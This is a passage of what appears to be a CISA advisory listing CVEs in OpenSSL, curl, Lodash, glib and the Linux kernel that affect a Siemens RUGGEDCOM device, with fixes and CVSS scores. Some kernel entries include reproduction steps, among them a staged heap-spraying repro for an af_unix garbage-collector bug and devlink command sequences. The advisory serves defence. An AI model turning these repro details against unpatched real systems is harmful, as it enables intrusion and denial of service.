<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-9232</a></h3>
<div class="csaf-accordion-content">
<p>Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-9232">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-10966</a></h3>
<div class="csaf-accordion-content">
<p>curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl from detecting MITM attackers and more.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-10966">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13465</a></h3>
<div class="csaf-accordion-content">
<p>Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched on 4.17.23</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13465">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1321.html">CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13601</a></h3>
<div class="csaf-accordion-content">
<p>A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13601">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39913</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-&gt;cork. syzbot reported the splat below. [0] The repro does the following: 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes) 2. Attach the prog to a SOCKMAP 3. Add a socket to the SOCKMAP 4. Activate fault injection 5. Send data less than cork_bytes At 5., the data is carried over to the next sendmsg() as it is smaller than the cork_bytes specified by bpf_msg_cork_bytes(). Then, tcp_bpf_send_verdict() tries to allocate psock-&gt;cork to hold the data, but this fails silently due to fault injection + __GFP_NOWARN. If the allocation fails, we need to revert the sk-&gt;sk_forward_alloc change done by sk_msg_alloc(). Let's call sk_msg_free() when tcp_bpf_send_verdict fails to allocate psock-&gt;cork. The "*copied" also needs to be updated such that a proper error can be returned to the caller, sendmsg. It fails to allocate psock-&gt;cork. Nothing has been corked so far, so this patch simply sets "*copied" to 0. [0]: WARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983 Modules linked in: CPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 RIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156 Code: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 &lt;0f&gt; 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc RSP: 0018:ffffc90000a08b48 EFLAGS: 00010246 RAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80 RDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000 RBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4 R10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380 R13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872 FS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0 Call Trace: __sk_destruct+0x86/0x660 net/core/sock.c:2339 rcu_do_batch kernel/rcu/tree.c:2605 [inline] rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861 handle_softirqs+0x286/0x870 kernel/softirq.c:579 __do_softirq kernel/softirq.c:613 [inline] invoke_softirq kernel/softirq.c:453 [inline] __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680 irq_exit_rcu+0x9/0x30 kernel/softirq.c:696 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline] sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39913">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40214</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: af_unix: Initialise scc_index in unix_add_edge(). Quang Le reported that the AF_UNIX GC could garbage-collect a receive queue of an alive in-flight socket, with a nice repro. The repro consists of three stages. 1) 1-a. Create a single cyclic reference with many sockets 1-b. close() all sockets 1-c. Trigger GC 2) 2-a. Pass sk-A to an embryo sk-B 2-b. Pass sk-X to sk-X 2-c. Trigger GC 3) 3-a. accept() the embryo sk-B 3-b. Pass sk-B to sk-C 3-c. close() the in-flight sk-A 3-d. Trigger GC As of 2-c, sk-A and sk-X are linked to unix_unvisited_vertices, and unix_walk_scc() groups them into two different SCCs: unix_sk(sk-A)-&gt;vertex-&gt;scc_index = 2 (UNIX_VERTEX_INDEX_START) unix_sk(sk-X)-&gt;vertex-&gt;scc_index = 3 Once GC completes, unix_graph_grouped is set to true. Also, unix_graph_maybe_cyclic is set to true due to sk-X's cyclic self-reference, which makes close() trigger GC. At 3-b, unix_add_edge() allocates unix_sk(sk-B)-&gt;vertex and links it to unix_unvisited_vertices. unix_update_graph() is called at 3-a. and 3-b., but neither unix_graph_grouped nor unix_graph_maybe_cyclic is changed because both sk-B's listener and sk-C are not in-flight. 3-c decrements sk-A's file refcnt to 1. Since unix_graph_grouped is true at 3-d, unix_walk_scc_fast() is finally called and iterates 3 sockets sk-A, sk-B, and sk-X: sk-A -&gt; sk-B (-&gt; sk-C) sk-X -&gt; sk-X This is totally fine. All of them are not yet close()d and should be grouped into different SCCs. However, unix_vertex_dead() misjudges that sk-A and sk-B are in the same SCC and sk-A is dead. unix_sk(sk-A)-&gt;scc_index == unix_sk(sk-B)-&gt;scc_index &lt;-- Wrong! &amp;&amp; sk-A's file refcnt == unix_sk(sk-A)-&gt;vertex-&gt;out_degree ^-- 1 in-flight count for sk-B -&gt; sk-A is dead !? The problem is that unix_add_edge() does not initialise scc_index. Stage 1) is used for heap spraying, making a newly allocated vertex have vertex-&gt;scc_index == 2 (UNIX_VERTEX_INDEX_START) set by unix_walk_scc() at 1-c. Let's track the max SCC index from the previous unix_walk_scc() call and assign the max + 1 to a new vertex's scc_index. This way, we can continue to avoid Tarjan's algorithm while preventing misjudgments.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40214">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40248</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: vsock: Ignore signal/timeout on connect() if already established During connect(), acting on a signal/timeout by disconnecting an already established socket leads to several issues: 1. connect() invoking vsock_transport_cancel_pkt() -&gt; virtio_transport_purge_skbs() may race with sendmsg() invoking virtio_transport_get_credit(). This results in a permanently elevated `vvs-&gt;bytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling. 2. connect() resetting a connected socket's state may race with socket being placed in a sockmap. A disconnected socket remaining in a sockmap breaks sockmap's assumptions. And gives rise to WARNs. 3. connect() transitioning SS_CONNECTED -&gt; SS_UNCONNECTED allows for a transport change/drop after TCP_ESTABLISHED. Which poses a problem for any simultaneous sendmsg() or connect() and may result in a use-after-free/null-ptr-deref. Do not disconnect socket on signal/timeout. Keep the logic for unconnected sockets: they don't linger, can't be placed in a sockmap, are rejected by sendmsg().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40248">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40250</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Clean up only new IRQ glue on request_irq() failure The mlx5_irq_alloc() function can inadvertently free the entire rmap and end up in a crash[1] when the other threads tries to access this, when request_irq() fails due to exhausted IRQ vectors. This commit modifies the cleanup to remove only the specific IRQ mapping that was just added. This prevents removal of other valid mappings and ensures precise cleanup of the failed IRQ allocation's associated glue object. Note: This error is observed when both fwctl and rds configs are enabled. [1] mlx5_core 0000:05:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:06:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 general protection fault, probably for non-canonical address 0xe277a58fde16f291: 0000 [#1] SMP NOPTI RIP: 0010:free_irq_cpu_rmap+0x23/0x7d Call Trace: ? show_trace_log_lvl+0x1d6/0x2f9 ? show_trace_log_lvl+0x1d6/0x2f9 ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] ? __die_body.cold+0x8/0xa ? die_addr+0x39/0x53 ? exc_general_protection+0x1c4/0x3e9 ? dev_vprintk_emit+0x5f/0x90 ? asm_exc_general_protection+0x22/0x27 ? free_irq_cpu_rmap+0x23/0x7d mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] irq_pool_request_vector+0x7d/0x90 [mlx5_core] mlx5_irq_request+0x2e/0xe0 [mlx5_core] mlx5_irq_request_vector+0xad/0xf7 [mlx5_core] comp_irq_request_pci+0x64/0xf0 [mlx5_core] create_comp_eq+0x71/0x385 [mlx5_core] ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core] mlx5_comp_eqn_get+0x72/0x90 [mlx5_core] ? xas_load+0x8/0x91 mlx5_comp_irqn_get+0x40/0x90 [mlx5_core] mlx5e_open_channel+0x7d/0x3c7 [mlx5_core] mlx5e_open_channels+0xad/0x250 [mlx5_core] mlx5e_open_locked+0x3e/0x110 [mlx5_core] mlx5e_open+0x23/0x70 [mlx5_core] __dev_open+0xf1/0x1a5 __dev_change_flags+0x1e1/0x249 dev_change_flags+0x21/0x5c do_setlink+0x28b/0xcc4 ? __nla_parse+0x22/0x3d ? inet6_validate_link_af+0x6b/0x108 ? cpumask_next+0x1f/0x35 ? __snmp6_fill_stats64.constprop.0+0x66/0x107 ? __nla_validate_parse+0x48/0x1e6 __rtnl_newlink+0x5ff/0xa57 ? kmem_cache_alloc_trace+0x164/0x2ce rtnl_newlink+0x44/0x6e rtnetlink_rcv_msg+0x2bb/0x362 ? __netlink_sendskb+0x4c/0x6c ? netlink_unicast+0x28f/0x2ce ? rtnl_calcit.isra.0+0x150/0x146 netlink_rcv_skb+0x5f/0x112 netlink_unicast+0x213/0x2ce netlink_sendmsg+0x24f/0x4d9 __sock_sendmsg+0x65/0x6a ____sys_sendmsg+0x28f/0x2c9 ? import_iovec+0x17/0x2b ___sys_sendmsg+0x97/0xe0 __sys_sendmsg+0x81/0xd8 do_syscall_64+0x35/0x87 entry_SYSCALL_64_after_hwframe+0x6e/0x0 RIP: 0033:0x7fc328603727 Code: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed ff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48 RSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727 RDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d RBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000 R13: 00000000000 ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40250">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40251</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy The function devl_rate_nodes_destroy is documented to "Unset parent for all rate objects". However, it was only calling the driver-specific `rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing the parent's refcount, without actually setting the `devlink_rate-&gt;parent` pointer to NULL. This leaves a dangling pointer in the `devlink_rate` struct, which cause refcount error in netdevsim[1] and mlx5[2]. In addition, this is inconsistent with the behavior of `devlink_nl_rate_parent_node_set`, where the parent pointer is correctly cleared. This patch fixes the issue by explicitly setting `devlink_rate-&gt;parent` to NULL after notifying the driver, thus fulfilling the function's documented behavior for all rate objects. [1] repro steps: echo 1 &gt; /sys/bus/netdevsim/new_device devlink dev eswitch set netdevsim/netdevsim1 mode switchdev echo 1 &gt; /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs devlink port function rate add netdevsim/netdevsim1/test_node devlink port function rate set netdevsim/netdevsim1/128 parent test_node echo 1 &gt; /sys/bus/netdevsim/del_device dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: devl_rate_leaf_destroy+0x8d/0x90 __nsim_dev_port_del+0x6c/0x70 [netdevsim] nsim_dev_reload_destroy+0x11c/0x140 [netdevsim] nsim_drv_remove+0x2b/0xb0 [netdevsim] device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 device_unregister+0x1a/0x60 del_device_store+0x111/0x170 [netdevsim] kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x55/0x10f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [2] devlink dev eswitch set pci/0000:08:00.0 mode switchdev devlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000 devlink port function rate add pci/0000:08:00.0/group1 devlink port function rate set pci/0000:08:00.0/32768 parent group1 modprobe -r mlx5_ib mlx5_fwctl mlx5_core dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: devl_rate_leaf_destroy+0x8d/0x90 mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core] mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core] mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core] mlx5_sf_esw_event+0xc4/0x120 [mlx5_core] notifier_call_chain+0x33/0xa0 blocking_notifier_call_chain+0x3b/0x50 mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core] 